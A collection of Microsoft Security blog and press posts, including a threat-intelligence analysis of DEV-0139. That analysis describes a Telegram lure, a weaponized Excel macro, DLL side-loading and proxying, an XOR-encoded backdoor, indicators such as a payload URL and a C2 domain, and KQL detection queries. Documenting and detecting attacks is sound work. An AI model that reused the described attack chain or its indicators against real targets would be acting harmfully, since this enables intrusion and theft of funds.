Trained across security and networking disciplines and armed with trillions of data signals, Security Copilot dramatically increases the reach, speed and effectiveness of any security team
REDMOND, Wash. — March 28, 2023 — Microsoft Corp. on Tuesday announced it is bringing the next generation of AI to cybersecurity with the launch of Microsoft Security Copilot, giving defenders a much-needed tool to quickly detect and respond to threats and better understand the threat landscape overall. Security Copilot will combine Microsoft’s vast threat intelligence footprint with industry-leading expertise to augment the work of security professionals through an easy-to-use AI assistant.
“Today the odds remain stacked against cybersecurity professionals. Too often, they fight an asymmetric battle against relentless and sophisticated attackers,” said Vasu Jakkal, corporate vice president, Microsoft Security. “With Security Copilot, we are shifting the balance of power into our favor. Security Copilot is the first and only generative AI security product enabling defenders to move at the speed and scale of AI.”
Security Copilot is designed to work seamlessly with security teams, empowering defenders to see what is happening in their environment, learn from existing intelligence, correlate threat activity, and make more informed, efficient decisions at machine speed.
Simplifying complexity and accelerating responses
In a world where there are 1,287 password attacks per second, fragmented tools and infrastructure have not been enough to stop attackers. And although attacks have increased 67% over the past five years, the security industry has not been able to hire enough cyberrisk professionals to keep pace. This has led to defenders who are overwhelmed searching for well-disguised attacks within an impossibly large volume of expanding network traffic and other signals.
Security Copilot will simplify complexity and amplify the capabilities of security teams by summarizing and making sense of threat intelligence, helping defenders see through the noise of web traffic and identify malicious activity.
It will also help security teams catch what others miss by correlating and summarizing data on attacks, prioritizing incidents and recommending the best course of action to swiftly remediate diverse threats, in time.
Continually learning to augment the expertise of security teams
Security Copilot will also continually learn and improve to help ensure that security teams are operating with the latest knowledge of attackers, their tactics, techniques and procedures. The product will provide ongoing access to the most advanced OpenAI models to support demanding security tasks and applications. Its visibility into threats is powered by both the customer organization’s security data and Microsoft’s vast threat analysis footprint.
These capabilities can empower security teams of any size with the skills and abilities of much larger organizations. In addition, Security Copilot helps address skills shortages in cybersecurity by bridging knowledge gaps and enhancing workflows, threat actor profiles and incident reporting across teams.
“Advancing the state of security requires both people and technology — human ingenuity paired with the most advanced tools that help apply human expertise at speed and scale,” said Charlie Bell, executive vice president, Microsoft Security. “With Security Copilot we are building a future where every defender is empowered with the tools and technologies necessary to make the world a safer place.”
Built on the Microsoft platform and industry-leading threat intelligence
Microsoft is uniquely qualified to help customers explore and adapt AI to boost their cybersecurity defenses. Microsoft Security is actively tracking more than 50 ransomware gangs as well as more than 250 unique nation-state cybercriminal organizations, and receives 65 trillion threat signals every day. Microsoft technology blocks more than 25 billion brute-forced password theft attempts every second, and more than 8,000 security professionals at Microsoft analyze more security signals than almost any other company — on average Microsoft’s Security Operations Center analysts utilize over 100 different data sources.
Acquisitions like RiskIQ and Miburo give Microsoft breath of signal and depth intelligence on threat actors that no one else has. Security Copilot also integrates natively with a growing list of Microsoft Security products, such as Microsoft Sentinel and Microsoft Defender, to help customers create an end-to-end experience across their entire security program.
Microsoft (Nasdaq “MSFT” @microsoft) enables digital transformation for the era of an intelligent cloud and an intelligent edge. Its mission is to empower every person and every organization on the planet to achieve more.
For more information, press only:
Microsoft Media Relations, WE Communications, (425) 638-7777, [email protected]
Note to editors: For more information, news and perspectives from Microsoft, please visit the Microsoft News Center at http://news.microsoft.com. Web links, telephone numbers and titles were correct at time of publication but may have changed. For additional assistance, journalists and analysts may contact Microsoft’s Rapid Response Team or other appropriate contacts listed at https://news.microsoft.com/microsoft-public-relations-contacts.
The end of the year typically brings with it a small library of reports with predictions for the year ahead. The value in these reports is less in the precise predictions themselves—given how interconnected the world is, no one has a perfect crystal ball. Rather, the forecasts help frame the thinking about the possibilities for the coming year, and what they might mean for you. With that in mind, I would like to share five predictions for 2023 that resonated with me and explain what they could mean for endpoint management in your organization. After reviewing these predictions, I encourage you to review your current endpoint security posture, and how Microsoft Intune can help further improve it in 2023.
1. Strong cloud adoption rates will continue
Macroeconomists may be pessimistic about gross domestic product growth in Europe and the United States in 2023, but even in weak macroeconomic scenarios, cloud growth rates remain stellar.1Gartner® predicts almost 30 percent growth for infrastructure as a service and almost 25 percent growth for platform as a service in 2023, as compared to 2022 in the worldwide public cloud user spending category. A September 2022 survey of chief technology officers (CTOs) by Evercore-ISI asked the top things they would do in response to reduced budgets or inflationary pressure.2 The top answer (from 44 percent of CTOs): increase their use of the cloud. Gartner® predicts that by 2025 more than 90 percent of clients will use cloud-based unified endpoint management (UEM) tools, up from 50 percent in 2022. So, if you have not migrated your UEM to the cloud yet, 2023 is the year to start.
2. Security will remain the top issue for CTOs into 2023
When asked in September about their highest priority project (in terms of incremental spending), 42 percent of CTOs said cloud security. Network security was the second most common response, with analytics third.2 Credit Suisse recently polled CTOs on how different categories in their IT budget would grow.3 In 2021 and 2022, security was ranked top, with an 11 percent increase. Asked to predict the growth in security spending in 2026, security again ranked highest, but the expected increase was even more: 14 percent. Underlying factors provide color to the raw growth numbers. The geopolitical storm continues, and new avenues continue to emerge for hackers. I expect to hear even more about deepfake videos and ransomware as a service in 2023. So, how do chief information security officers (CISOs) strengthen their organization’s defenses in 2023? We would propose two initiatives: first, ensure security software is suitably integrated with a unified console to enable fewer points of vulnerability and more automation. By extension, this might mean consolidating vendors. Second, tackle the human aspect: invest in upskilling staff on how best to be aware of potential attacks.4
3. Worker mobility will increase further
The past few years have changed the model for knowledge workers. 2023 will see several shifts that will add to the hybrid work from anywhere (and hence, protect everywhere) trend. Next year will see mass adoption of 5G capable devices: Juniper Research estimates that there will be 600 million more 5G connections added in 2023 alone.5 Technological trends will be compounded by demographic trends, such as “productivity paranoia,” where workers want to show they are being productive, no matter where they are. What does this mean for CISOs? New working styles, new networks, and new devices mean new attack vectors. In 2023, be ready to protect your workers who are working from anywhere, not just from home.
4. CTOs will need to pay more attention to local factors
There is always a balance between global and local initiatives, but in 2023, we expect that it will be increasingly difficult to just adopt a one-size-fits-all global shortcut. We are seeing an increasing number of national regulations related to data sovereignty, with implications for where that data is stored and secured.6 2023 will see further digital transformation of public sector agencies. These agencies often have more country-specific security or compliance rules compared to their private sector counterparts. As such, CISOs need to ensure their endpoint management solutions (and, indeed, their entire technology architecture) can adapt to handle extra local requirements.
5. Truly transformative technology will rise to the top
My final prediction is that 2023 will see further clarity on the difference between genuinely transformative technology and tech that has been overhyped. One technology that I expect to compare favorably for enterprises in 2023 will be more advanced forms of automation, such as AI. AI start-ups have seen more than USD100 billion in venture capital investment since 2020, in everything from the development of new drugs to new ways to create art and writing (and, perhaps, eventually, transform how blogs are created!).7 Security represents a great opportunity for advanced automation and AI, given the nature of the ongoing problems CISOs must grapple with. As such, while new AI-generated images may garner the headlines, away from the limelight we expect many other enterprise software solutions to benefit from both sophisticated AI and simply greater automation.8 For example, in endpoint management, Gartner® sees that by 2027, UEM and digital employee experience tools will converge—to drive autonomous endpoint management, reducing human effort by at least 40 percent. The more that security tasks are automated, the more time is freed up for more strategic work by your key staff.
Learn more
I hope you found these 2023 trends thought-provoking. I would encourage you to continue to think about what the macro situation might mean specifically for your organization and translate that into an action plan for your Microsoft Intune assets in 2023. In the meantime, I wish you all a safe and thoughtful holiday season and wish you continued success in the new year.
Learn more about how Microsoft Intune can simplify your endpoint management:
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
We’re excited to announce that Microsoft is named a Leader in The Forrester Wave™: Security Analytics Platforms, Q4 2022. Microsoft achieved the highest possible score in 17 different criteria, including partner ecosystem, innovation roadmap, product security, case management, and architecture.
With threats like ransomware increasing in volume and complexity, it’s never been more important for chief information security officers (CISOs) to invest in solutions that will keep their companies safe and running. As the threat landscape continues to proliferate, cloud-native security information and event management (SIEM) solutions like Microsoft Sentinel have become a central part of a SecOps solution and have evolved to meet the new needs of customers to move faster.
We believe this placement validates our continued investment in Microsoft Sentinel, security research, and threat intelligence. We take it as a vote of confidence in our ability to keep our customers safe and working fearlessly. Microsoft Security is named a leader on seven different Forrester Wave™ reports and continues to invest in innovative solutions that work together to keep our customers’ businesses safer.
Microsoft was evaluated on several capabilities that empower customers to move faster to identify, investigate, and remediate threats. Some particularly important features include:
Providing flexibility to customers to create their own rules using Kusto Query Language (KQL) or by bringing their own machine learning. This allows security operations center (SOC) teams to build automations that work for their organization and reduces the amount of time spent on repetitive tasks.
Comprehensive threat intelligence that empowers customers to keep up with the evolving threat landscape.
Scaled search and storage of large volumes of data allow customers to protect their digital ecosystems at scale and monitor all their clouds, platforms, and endpoints in one place.
The Microsoft Sentinel strategy
Microsoft Sentinel is a next-generation SIEM solution that collects security data across multicloud, multi-platform data sources. The comprehensive SOC platform provides user entity and behavior analytics (UEBA), threat intelligence, and security orchestration, automation, and response (SOAR) capabilities, along with deep integrations into Microsoft Defender threat protection products’ comprehensive coverage across SIEM and extended detection and response (XDR). Sentinel empowers companies to leverage cloud-scale, innovative AI and automation to move at machine speed and stay ahead of evolving threats.
What makes the Microsoft suite of security solutions unique is the native integrations of SIEM with XDR to provide quick setup, more comprehensive coverage and context, and faster response time. Customers who leverage Microsoft Defender XDR products may be eligible for discounts on Microsoft Sentinel data ingestion.
Over the past year, Microsoft has invested in many new capabilities, including content for Internet of Things (IoT) devices, business application coverage including SAP, enhanced SOAR capabilities, and improved workflow management. These capabilities help our customers to protect more of their digital ecosystem, automate responses to more types of threats, and build an efficient and collaborative SOC.
What’s next in Microsoft Security
Microsoft is dedicated to continued leadership in security. Continued investments will provide customers with the intelligence, automation, and scalability they need to protect their businesses and work efficiently. Upcoming enhancements include the integration of more threat intelligence, new ways to hunt across large sets of data, and more context and prioritization guidance in alerts. New AI solutions will allow SecOps teams to more easily identify the most urgent issues and give guidance on how similar customers have reacted to similar incidents. The Microsoft vision is to provide a central platform for SOCs to understand the health of their entire business and quickly act on issues.
Microsoft Security is committed to empowering SecOps teams with security tools and platforms that enable the critical protection your users rely on. To experience Microsoft Sentinel at your organization, get started with a free trial today.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
Today, the third edition of Cyber Signals was released spotlighting security trends and insights gathered from Microsoft’s 43 trillion daily security signals and 8,500 security experts. In this edition, we share new insights on wider risks that converging IT, Internet of Things (IoT), and operational technology (OT) systems pose to critical infrastructure. Cyber Signals presents new data on these risks with practical recommendations for enterprises.
OT is a combination of hardware and software across programmable systems or devices that interact with the physical environment (or manage devices that interact with the physical environment). Examples of OT can include building management systems, fire control systems, and physical access control mechanisms, like doors and elevators.
With increasing connectivity across converging IT, OT, and IoT increasing, organizations and individuals need to rethink cyber risk impact and consequences. Similar to how the loss of a laptop or modern vehicle containing a homeowner’s cached Wi-Fi credentials could grant a property thief unauthorized network access, compromising a manufacturing facility’s remotely connected equipment or a smart building’s security cameras introduces new vectors for threats like malware or industrial espionage.
With more than 41 billion IoT devices across enterprise and consumer environments expected by 2025—according to International Data Corporation (IDC) research1—devices such as cameras, smart speakers, or locks and commercial appliances can become entry points for attackers.
As OT systems underpinning energy, transportation, and other infrastructures become increasingly connected to IT systems, the risk of disruption and damage grows as boundaries blur between these formerly separated worlds. Microsoft has identified unpatched, high-severity vulnerabilities in 75 percent of the most common industrial controllers in customer OT networks, illustrating how challenging it is for even well-resourced organizations to patch control systems in demanding environments sensitive to downtime.
For businesses and infrastructure operators across industries, the defensive imperatives are gaining total visibility over connected systems and weighing evolving risks and dependencies. Unlike the IT landscape of common operating systems, business applications, and platforms, OT and IoT landscapes are more fragmented, featuring proprietary protocols and devices that may not have cybersecurity standards. Other realities affecting things like patching and vulnerability management are also factors.
While connected OT and IoT-enabled devices offer significant value to organizations looking to modernize workspaces, become more data-driven, and ease demands on staff through shifts like remote management and automation in critical infrastructure networks, if not properly secured, they increase the risk of unauthorized access to operational assets and networks.
David Atch, Microsoft Threat Intelligence, Head IoT and OT Security Research, highlights in this edition’s profile that to address IT and OT threats to critical infrastructure, organizations must have full visibility into the number of IT, OT, and IoT devices in their enterprise, where or how they converge, and the vital data, resources, and utilities accessible across these devices. Without this, organizations face both mass information disclosure (such as leaked production data of a factory) and the potential elevation of privilege for command and control of cyber-physical systems (such as stopping a factory production line). He shares additional insights in the Cyber Signals digital briefing where we take a deeper dive into wider risks that converging IT, IoT, and OT systems pose.
Securing IoT solutions with a Zero Trust security model starts with non-IoT specific requirements—specifically ensuring you have implemented the basics to securing identities and their devices and limiting their access. These requirements include explicitly verifying users, having visibility into the devices on the network, and real-time risk detections.
We hope these resources are helpful in understanding and managing this evolving risk. To learn more about IT, OT, and IoT threats and explore the latest cybersecurity insights and updates visit Security Insider.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
Today, we are glad to release the third version of the threat matrix for Kubernetes, an evolving knowledge base for security threats that target Kubernetes clusters. The matrix, first released by Microsoft in 2020, was the first attempt to systematically cover the attack landscape of Kubernetes. Since then, the project has received great attention and interest from the Kubernetes security community and was updated last year to keep up with the evolving threat landscape. The latest version of the matrix comes in a new format that simplifies usage of the knowledge base and with new content to help mitigate threats. The new matrix is available at: http://aka.ms/KubernetesThreatMatrix.
What’s new
Mitigations methods
Understanding the attack surface of containerized environments is the first step of building security solutions for these environments. In addition to helping organizations measure and assess coverage of threats with matching detections, the updated threat matrix for Kubernetes can now also help organizations with a systematic approach to apply mitigation techniques that prevent attacks from being successfully launched.
In this third version of the threat matrix, we introduce a collection of mitigations specific to Kubernetes environments and associate each with relevant threat techniques. Those mitigations, as displayed below in Figure 1, provide practical tools to prevent the various attack techniques, using built-in Kubernetes and cloud tools.
Figure 1. A technique page with a mitigation section
When reviewing the different threat techniques in the matrix, a list of relevant mitigations is provided so that organizations can see if they are taking all the necessary steps to prevent a threat. Additionally, when looking at a specific mitigation, a list of relevant threat techniques is displayed and can help organizations prioritize their mitigation implementation plan according to their threat assessment and detection coverage in each area.
Mapping to MITRE ATT&CK techniques
Last year, MITRE added a container matrix to the MITRE ATT&CK framework. MITRE ATT&CK for containers matrix, inspired by Microsoft threat matrix for Kubernetes, is a result of a joint effort between MITRE, Microsoft, and additional companies in the industry. The differences between Microsoft’s and MITRE’s matrices are described in this blog. In the new version of the Microsoft threat matrix for Kubernetes, we include a mapping between the Microsoft matrix and MITRE ATT&CK techniques and mitigations, as displayed below in Figure 2. This can help organizations to efficiently use the two frameworks.
Figure 2. Mapping to MITRE ATT&CK techniques
MITRE ATT&CK matrix for containers does not have an equivalent technique for each of the techniques in the Microsoft threat matrix for Kubernetes. When there is no equivalent technique in the MITRE matrix, the Microsoft techniques might be mapped to a MITRE technique that is not part of MITRE’s containers matrix but shares the same principle. For example, the Backdoor Container (MS-TA9012) technique explains that attackers can use Kubernetes controllers (such as daemonsets) to run their code and survive reboots of the pods\nodes. This is very similar to MITRE’s Create or Modify System Process technique (T1543), which is about using services\daemons for the exact same purpose. Another example is the mapping between Malicious Admission Controller (MS-TA9015) and MITRE’s Event Triggered Execution. Although MITRE doesn’t talk about containerized environment, those two techniques share the same idea. In cases when there is no matching MITRE technique with the same principle, the Microsoft technique will not point back to a MITRE technique.
New techniques
The new version of the matrix also introduces two new techniques and additional re-categorization of existing techniques:
New technique: Static pods
A persistence technique which allows attackers to deploy pods that aren’t managed by the Kubernetes API server.
New technique: Collecting data from pod
Kubernetes-native technique which allows attackers to extract data from running pods.
Extending existing technique: Container service account
Attackers may create new service accounts or steal tokens of existing service accounts for future use from inside and outside the cluster. Therefore, we also added this technique to the persistence tactic.
Attackers may use management interfaces for discovery purposes, after gaining initial access to the cluster. By using the network reachability between pods, attackers can connect to management interfaces from the internal network, allowing them to get valuable information about the workload. Thus, we also added this technique to the discovery tactic.
Figure 3. New techniques and re-categorization of existing techniques
New web interface
As new threats were added to the Kubernetes matrix and additional content was introduced, it became increasingly harder to effectively deliver the breadth of information included in the matrix as a blog post. Looking for ways to make it easier to use the Kubernetes threats and mitigations matrix as reference material for day-to-day security operations, we are releasing the matrix as a web site, shown in Figure 4 below.
Figure 4. The new interface of the threat matrix for Kubernetes
The threat matrix for Kubernetes can help organizations to have visibility to the unique attack surface of Kubernetes and help them to measure their coverage to those threats. With the new mitigation section, organizations can now understand the measures required to prevent those threats.
Microsoft Defender for Cloud can help detect and mitigate threats in your Kubernetes environments. Learn more about Microsoft Defender for Cloud support for container security.
Over the past several years, the cryptocurrency market has considerably expanded, gaining the interest of investors and threat actors. Cryptocurrency itself has been used by cybercriminals for their operations, notably for ransom payment in ransomware attacks, but we have also observed threat actors directly targeting organizations within the cryptocurrency industry for financial gain. Attacks targeting this market have taken many forms, including fraud, vulnerability exploitation, fake applications, and usage of info stealers, as attackers attempt to get their hands on cryptocurrency funds.
We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
Figure 1. Overview of the attack
Further investigation through our telemetry led to the discovery of another file that uses the same DLL proxying technique. But instead of a malicious Excel file, it is delivered in an MSI package for a CryptoDashboardV2 application, dated June 2022. This may suggest other related campaigns are also run by the same threat actor, using the same techniques.
In this blog post, we will present the details uncovered from our investigation of the attack against a cryptocurrency investment company, as well as analysis of related files, to help similar organizations understand this kind of threat, and prepare for possible attacks. Researchers at Volexity recently published their findings on this attack as well.
As with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.
Initial compromise
To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram. In the specific attack, DEV-0139 got in touch with their target on October 19, 2022 by creating a secondary Telegram group with the name <NameOfTheTargetedCompany> <> OKX Fee Adjustment and inviting three employees. The threat actor created fake profiles using details from employees of the company OKX. The screenshot below shows the real accounts and the malicious ones for two of the users present in the group.
Figure 2. Legitimate profiles of cryptocurrency exchange employees (left) and fake profiles created by the threat actor (right)
It’s worth noting that the threat actor appears to have a broad knowledge of the cryptocurrency industry and the challenges the targeted company may face. The threat actor asked questions about fee structures, which are the fees used by crypto exchange platforms for trading. The fees are a big challenge for investment funds as they represent a cost and must be optimized to minimize impact on margin and profits. Like many other companies in this industry, the largest costs come from fees charged by exchanges. This is a very specific topic that demonstrates how the threat actor was advanced and well prepared before contacting their target.
After gaining the trust of the target, the threat actor sent a weaponized Excel document to the target containing further details on the fees to appear legitimate. The threat actor used the fee structure discussion as an opportunity to ask the target to open the weaponized Excel file and fill in their information.
Weaponized Excel file analysis
The weaponized Excel file, which has the file name OKX Binance & Huobi VIP fee comparision.xls (Sha256: abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0), is well crafted and contains legitimate information about the current fees used by some crypto exchanges. The metadata extracted showed that the file was created by the user Wolf:
File name
OKX Binance & Huobi VIP fee comparision.xls
CompObjUserTypeLen
31
CompObjUserType
Microsoft Excel 2003 Worksheet
ModifyDate
2022:10:14 02:34:33
TitleOfParts
Comparison_Oct 2022
SharedDoc
No
Author
Wolf
CodePage
Windows Latin 1 (Western European)
AppVersion
16
LinksUpToDate
No
ScaleCrop
No
LastModifiedBy
Wolf
HeadingPairs
Worksheets, 1
FileType
XLS
FileTypeExtension
xls
HyperlinksChanged
No
Security
None
CreateDate
2022:10:14 02:34:31
Software
Microsoft Excel
MIMEType
application/vnd.ms-excel
Figure 3. The information in the malicious Excel file
The macro is obfuscated and abuses UserForm (a feature used to create windows) to store data and variables. In this case, the name of the UserForm is IFUZYDTTOP, and the macro retrieves the information with the following code IFUZYDTTOP.MgQnQVGb.Caption where MgQnQVGb is the name of the label in the UserForm and .caption allows to retrieve the information stored into the UserForm.
The table below shows the data retrieved from the UserForm:
The macro retrieves some parameters from the UserForm as well as another XLS file stored in base64. The XLS file is dropped into the directory C:\ProgramData\Microsoft Media as VSDB688.tmp and runs in invisible mode.
Figure 4. The deobfuscated code to load the extracted worksheet in invisible mode.
Additionally, the main sheet in the Excel file is protected with the password dragon to encourage the target to enable the macros. The sheet is then unprotected after installing and running the other Excel file stored in Base64. This is likely used to trick the user to enable macros and not raise suspicion.
Extracted worksheet
The second Excel file, VSDB688.tmp (Sha256: a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9), is used to retrieve a PNG file that is parsed later by the macro to extract two executable files and the encrypted backdoor. Below is the metadata for the second worksheet:
File Name
VSDB688.tmp
CompObjUserType
Microsoft Excel 2003 Worksheet
ModifyDate
2022:08:29 08:07:24
TitleOfParts
Sheet1
SharedDoc
No
CodePage
Windows Latin 1 (Western European)
AppVersion
16
LinksUpToDate
No
ScaleCrop
No
CompObjUserTypeLen
31
HeadingPairs
Worksheets, 1
FileType
XLS
FileTypeExtension
xls
HyperlinksChanged
No
Security
None
CreateDate
2006:09:16 00:00:00
Software
Microsoft Excel
MIMEType
application/vnd.ms-excel
Figure 5. The second file is completely empty but contains the same UserForm abuse technique as the first stage.
The table below shows the deobfuscated data retrieved from the UserForm:
The macro retrieves some parameters from the UserForm then downloads a PNG file from hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Background.png. The file was no longer available at the time of analysis, indicating that the threat actor likely deployed it only for this specific attack.
Figure 6. Deobfuscated code that shows the download of the file Background.png
The PNG is then split into three parts and written in three different files: the legitimate file logagent.exe, a malicious version of wsock32.dll, and the XOR encrypted backdoor with the GUID (56762eb9-411c-4842-9530-9922c46ba2da). The three files are used to load the main payload to the target system.
Figure 7. The three files are written into C:\\ProgramData\SoftwareCache\ and run using the CreateProcess API
Loader analysis
Two of the three files extracted from the PNG file, logagent.exe and wsock32.dll, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.
Logagent.exe
Logagent.exe (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.
The file contains the following metadata, but it is not signed:
The logagent.exe imports function from the wsock32.dll which is abused by the threat actor to load malicious code into the targeted system. To trigger and run the malicious wsock32.dll, logagent.exe is run with the following arguments previously retrieved by the macro: 56762eb9-411c-4842-9530-9922c46ba2da /shadow. Both arguments are then retrieved by wsock32.dll. The GUID 56762eb9-411c-4842-9530-9922c46ba2da is the filename for the malicious wsock32.dll to load and /shadow is used as an XOR key to decrypt it. Both parameters are needed for the malware to function, potentially hindering isolated analysis.
Figure 8. Command line execution from the running process logagent.exe
Wsock32.dll
The legitimate wsock32.dll is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of wsock32.dll to evade detection. The malicious wsock32.dll is loaded by logagent.exe through DLL side-loading and uses DLL proxying to call the legitimate functions from the real wsock32.dll and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a legitimate DLL that implements that exported function. In this attack, the malicious wsock32.dll acts as a proxy between logagent.exe and the legitimate wsock32.dll.
It is possible to notice that the DLL is forwarding the call to the legitimate functions by looking at the import address table:
Figure 9. Import Address Table from wsock32.dllFigure 10. Retrieving data with PeStudio revealed the original file name for the malicious wsock32.dll.
When the malicious wsock32.dll is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the CreateFile API to retrieve a file handle.
Figure 11. Verification of the presence of the file 56762eb9-411c-4842-9530-9922c46ba2da for decryption
The malicious wsock32.dll loads and decodes the final implant into the memory with the GUID name which is used to remote access the infected machine.
Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.
Related attack
We identified another file using a similar mechanism as logagent.exe and delivering the same payload. The loader is packaged as an MSI package and as posed an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called tplink.exe to sideload the malicious DLL called DUser.dll and uses DLL proxying as well.
creation datetime
11/12/2009 11:47
author
168 Trading
title
Installation Database
page count
200
word count
2
keywords
Installer, MSI, Database
last saved
11/12/2009 11:47
revision number
{30CD8B94-5D3C-4B55-A5A3-3FC9C7CCE6D5}
last printed
11/12/2009 11:47
application name
Advanced Installer 14.5.2 build 83143
subject
CryptoDashboardV2
template
x64;1033
code page
Latin I
comments
This installer database contains the logic and data required to install CryptoDashboardV2.
Figure 12. Installation details of the MSI file
Once the package is installed, it runs and side-loads the DLL using the following command: C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe” 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, where it noticeably uses a different GUID.
Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:
Once the DLL is running, it loads and decodes the implant in the memory and starts beaconing the same domain. In that case, the implant is using the GUID name 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key /sven.
Implant analysis
The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:
First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.
Figure 13. Details about the connection to the C2.Figure 14. The sample is connecting back to the domain name strainservice[.]com.
Infrastructure
It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account has been set up quickly for a one shot, indicating that it was created for only one target.
We identified one domain used as C2 server, strainservice[.]com and connected back to the two implants. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had port 80, 443, and 2083. The implants were communicated on port 443.
Defending against targeted attacks
In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new, but manage hundreds of millions of dollars, raising interest by threat actors.
In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified was luring a fake crypto dashboard application.
The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:
Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
Query that looks for Office apps that create a file within an uncommon directory (less that five occurrences), makes a set of each machine this is seen on, and each user that has executed it to help look for how many users/hosts are compromised:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5
Query that summarizes child process of Office apps, looking for less than five occurrences:
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5
Query that lists of all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths, with less than five occurrences:
DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5
Query that searches for connections to malicious domains and IP addresses:
DeviceNetworkEvents
| where (RemoteUrl has_any ("strainservice.com")) or (RemoteIP has_any ("198.54.115.248"))
